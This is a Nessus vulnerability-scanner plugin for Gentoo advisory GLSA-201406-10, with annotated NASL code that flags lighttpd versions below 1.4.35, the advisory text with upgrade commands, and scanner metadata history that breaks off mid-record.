ID GENTOO_GLSA-201406-10.NASL Type nessus Reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
The remote host is affected by the vulnerability described in GLSA-201406-10
(lighttpd: Multiple vulnerabilities)
Multiple vulnerabilities have been discovered in lighttpd. Please review
the CVE identifiers referenced below for details.
Impact :
A remote attacker could create a Denial of Service condition.
Furthermore, a remote attacker may be able to execute arbitrary SQL
statements.
Workaround :
There is no known workaround at this time.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 201406-10.
#
# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#
include("compat.inc");
# Registration branch: when `description` is set, only the plugin metadata
# below is declared and the script stops at exit(0), before any host check.
if (description)
{
script_id(76062);
script_version("1.6");
script_cvs_date("Date: 2018/07/12 19:01:15");
# One finding stands for all six CVEs (and the matching Bugtraq IDs); a hit
# does not say which of them is reachable on the scanned host.
script_cve_id("CVE-2011-4362", "CVE-2012-5533", "CVE-2013-4508", "CVE-2013-4559", "CVE-2013-4560", "CVE-2014-2323");
script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);
script_xref(name:"GLSA", value:"201406-10");
script_name(english:"GLSA-201406-10 : lighttpd: Multiple vulnerabilities");
# The summary states the method: the installed package version is compared,
# nothing is sent to the lighttpd service itself.
script_summary(english:"Checks for updated package(s) in /var/db/pkg");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Gentoo host is missing one or more security-related
patches."
);
# Advisory text shown in the report; it is copied from the GLSA.
script_set_attribute(
attribute:"description",
value:
"The remote host is affected by the vulnerability described in GLSA-201406-10
(lighttpd: Multiple vulnerabilities)
Multiple vulnerabilities have been discovered in lighttpd. Please review
the CVE identifiers referenced below for details.
Impact :
A remote attacker could create a Denial of Service condition.
Futhermore, a remote attacker may be able to execute arbitrary SQL
statements.
Workaround :
There is no known workaround at this time."
);
script_set_attribute(
attribute:"see_also",
value:"https://security.gentoo.org/glsa/201406-10"
);
# Remediation: upgrade to lighttpd 1.4.35 or later, the same version
# boundary the check part of this plugin uses.
script_set_attribute(
attribute:"solution",
value:
"All lighttpd users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'"
);
# CVSS v2 base vector: network attack vector, high access complexity, no
# authentication, complete confidentiality/integrity/availability impact.
# NOTE(review): a single vector covers six CVEs; presumably it is the most
# severe of them, so use per-CVE scores when prioritising - confirm.
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
# Temporal vector: proof-of-concept exploit code (E:POC), official fix
# available (RL:OF), report confirmed (RC:C).
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
# "local" marks this as a check on data collected from the host, not a
# remote probe of the web server.
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:lighttpd");
script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
script_set_attribute(attribute:"patch_publication_date", value:"2014/06/13");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/16");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.");
script_family(english:"Gentoo Local Security Checks");
# The plugin depends on ssh_get_info.nasl and on three knowledge-base keys.
# NOTE(review): presumably those keys are only populated by a credentialed
# scan, so no finding on an uncredentialed scan does not mean the host is
# patched - confirm against ssh_get_info.nasl.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
# Metadata only in this mode: leave before the check logic.
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");
# Preconditions. Each missing knowledge-base key ends the run through audit()
# with its own reason, so "not checked" is kept apart from "not affected".
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}
if (!get_kb_item("Host/Gentoo/release"))
{
  audit(AUDIT_OS_NOT, "Gentoo");
}
if (!get_kb_item("Host/Gentoo/qpkg-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Version-only test: www-servers/lighttpd below 1.4.35 is treated as
# vulnerable, 1.4.35 and later as unaffected. Nothing here looks at whether
# lighttpd is running or how it is configured.
# NOTE(review): presumably qpkg_check() compares against the package list
# stored under Host/Gentoo/qpkg-list - confirm in qpkg.inc.
vuln_found = qpkg_check(
  package:"www-servers/lighttpd",
  unaffected:make_list("ge 1.4.35"),
  vulnerable:make_list("lt 1.4.35")
);

if (!vuln_found)
{
  # No vulnerable version matched: say whether lighttpd was examined and
  # found unaffected, or was never seen among the tested packages.
  checked = qpkg_tests_get();
  if (checked)
  {
    audit(AUDIT_PACKAGE_NOT_AFFECTED, checked);
  }
  else
  {
    audit(AUDIT_PACKAGE_NOT_INSTALLED, "lighttpd");
  }
}
else
{
  # Raise the finding on port 0; the package detail from qpkg_report_get()
  # is attached only when report_verbosity is above 0.
  if (report_verbosity > 0)
  {
    security_hole(port:0, extra:qpkg_report_get());
  }
  else
  {
    security_hole(0);
  }
  exit(0);
}
{"id": "GENTOO_GLSA-201406-10.NASL", "bulletinFamily": "scanner", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "description": "The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.", "published": "2014-06-16T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/76062", "reporter": "This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.", "references": ["https://security.gentoo.org/glsa/201406-10"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "type": "nessus", "lastseen": "2019-11-01T02:40:33", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-201406-10 (lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL statements.\n Workaround :\n\n There is no known workaround at this time.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "b5ed92c198c303f0e003edabcb645b031bb5113e201725ea6557070fd61f9431", "hashmap": [{"hash": "6c5dba810aeab70d01eba769ffba08ab", "key": "references"}, {"hash": "9ee165aded032a2baf9a181faf11a74c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "4e75371be5bbd5341cf892fef0e9c013", "key": "title"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "f346bc8435b78109bc682f41b009e5b5", "key": "cvelist"}, {"hash": "20ba12b0faa8a5525529ad167476e074", "key": "published"}, {"hash": "349e4405289c3c80feb5483aec6488bd", "key": "href"}, {"hash": "c0470adc003771bc6ae5d6914349f929", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "ed8cba01682fb0f90eb366101e3256da", "key": "description"}, {"hash": "650bdfae1cb37826e27306825abaf826", "key": "sourceData"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=76062", "id": "GENTOO_GLSA-201406-10.NASL", "lastseen": "2018-07-13T09:41:04", "modified": "2018-07-12T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "76062", "published": "2014-06-16T00:00:00", "references": ["https://security.gentoo.org/glsa/201406-10"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory 
GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif 
(!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-13T09:41:04"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "description": "The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-10-28T20:24:09", "references": [{"idList": ["SUSE-SU-2014:0474-1", "OPENSUSE-SU-2014:0449-1"], "type": "suse"}, {"idList": ["PACKETSTORM:118282"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-17319"], "type": "zdt"}, {"idList": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "type": "cve"}, {"idList": ["EDB-ID:22902", "EDB-ID:18295"], "type": "exploitdb"}, {"idList": ["GLSA-201406-10"], "type": "gentoo"}, {"idList": ["SECURITYVULNS:VULN:12116", "SECURITYVULNS:DOC:27504", "SECURITYVULNS:DOC:27485", "SECURITYVULNS:DOC:30003", "SECURITYVULNS:VULN:13405"], "type": "securityvulns"}, {"idList": ["OPENVAS:867539", "OPENVAS:1361412562310120553", "OPENVAS:1361412562310120162", "OPENVAS:1361412562310867539", "OPENVAS:867540", "OPENVAS:1361412562310121213", "OPENVAS:866877", "OPENVAS:1361412562310867540", "OPENVAS:892795", "OPENVAS:1361412562310892795"], "type": "openvas"}, {"idList": ["LIGHTTPD_1_4_34.NASL", "MANDRIVA_MDVSA-2013-277.NASL", "FEDORA_2014-2506.NASL", "DEBIAN_DSA-2795.NASL", "FEDORA_2014-2495.NASL", "OPENSUSE-2012-801.NASL", "OPENSUSE-2014-43.NASL", "FEDORA_2013-15345.NASL", "FREEBSD_PKG_90B27045953011E39D09000C2980A9F3.NASL", "ALA_ALAS-2014-299.NASL"], "type": "nessus"}, {"idList": ["1CD3CA42-33E6-11E2-A255-5404A67EEF98", "C6521B04-314B-11E1-9CF4-5404A67EEF98", "90B27045-9530-11E3-9D09-000C2980A9F3"], "type": "freebsd"}, {"idList": ["MYHACK58:62201788804"], "type": "myhack58"}, {"idList": ["DEBIAN:DSA-2381-:320B8", "DEBIAN:DSA-2877-1:CD2D1", "DEBIAN:DSA-2795-1:2DAAE", "DEBIAN:DSA-2368-1:91542"], "type": "debian"}, {"idList": ["SSV:60476", 
"SSV:72453", "SSV:61980", "SSV:24275", "SSV:76695", "SSV:30003", "SSV:26120"], "type": "seebug"}, {"idList": ["ALAS-2013-179", "ALAS-2014-299", "ALAS-2014-346", "ALAS-2012-107"], "type": "amazon"}]}, "score": {"modified": "2019-10-28T20:24:09", "value": 8.2, "vector": "NONE"}}, "hash": "204424037ef0d6f651416ca773f117e611bcf9c45eca5f721367573af08b8b37", "hashmap": [{"hash": "6c5dba810aeab70d01eba769ffba08ab", "key": "references"}, {"hash": "9ee165aded032a2baf9a181faf11a74c", "key": "pluginID"}, {"hash": "ed80408f65b06df34ed6dfdb743af507", "key": "cvss"}, {"hash": "eebc0e5cad997220d136d9e0c6386556", "key": "reporter"}, {"hash": "4e75371be5bbd5341cf892fef0e9c013", "key": "title"}, {"hash": "f346bc8435b78109bc682f41b009e5b5", "key": "cvelist"}, {"hash": "20ba12b0faa8a5525529ad167476e074", "key": "published"}, {"hash": "c0470adc003771bc6ae5d6914349f929", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "650bdfae1cb37826e27306825abaf826", "key": "sourceData"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "38a5f873bbf7b0934702849e098af575", "key": "href"}, {"hash": "a05ab3ced445f2578684b24e5a530e18", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/76062", "id": "GENTOO_GLSA-201406-10.NASL", "lastseen": "2019-10-28T20:24:09", "modified": "2019-10-02T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "76062", "published": "2014-06-16T00:00:00", "references": ["https://security.gentoo.org/glsa/201406-10"], "reporter": "This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201406-10.\n#\n# The advisory text 
is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif 
(!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "viewCount": 5}, "differentElements": ["modified"], "edition": 8, "lastseen": "2019-10-28T20:24:09"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is affected by the vulnerability described in GLSA-201406-10 (lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL statements.\n Workaround :\n\n There is no known workaround at this time.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "2947d1d3bc47ce7f7bd60d59f246d5158a909f34f81bcde7bd5cbe69aec43340", "hashmap": [{"hash": "6c5dba810aeab70d01eba769ffba08ab", "key": "references"}, {"hash": "9ee165aded032a2baf9a181faf11a74c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "4e75371be5bbd5341cf892fef0e9c013", "key": "title"}, {"hash": "f346bc8435b78109bc682f41b009e5b5", "key": "cvelist"}, {"hash": "20ba12b0faa8a5525529ad167476e074", "key": "published"}, {"hash": "349e4405289c3c80feb5483aec6488bd", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "c0470adc003771bc6ae5d6914349f929", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "ed8cba01682fb0f90eb366101e3256da", "key": "description"}, {"hash": "650bdfae1cb37826e27306825abaf826", "key": "sourceData"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=76062", "id": "GENTOO_GLSA-201406-10.NASL", "lastseen": "2018-08-30T19:34:48", "modified": "2018-07-12T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "76062", "published": "2014-06-16T00:00:00", "references": ["https://security.gentoo.org/glsa/201406-10"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory 
GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif 
(!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:34:48"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-201406-10 (lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
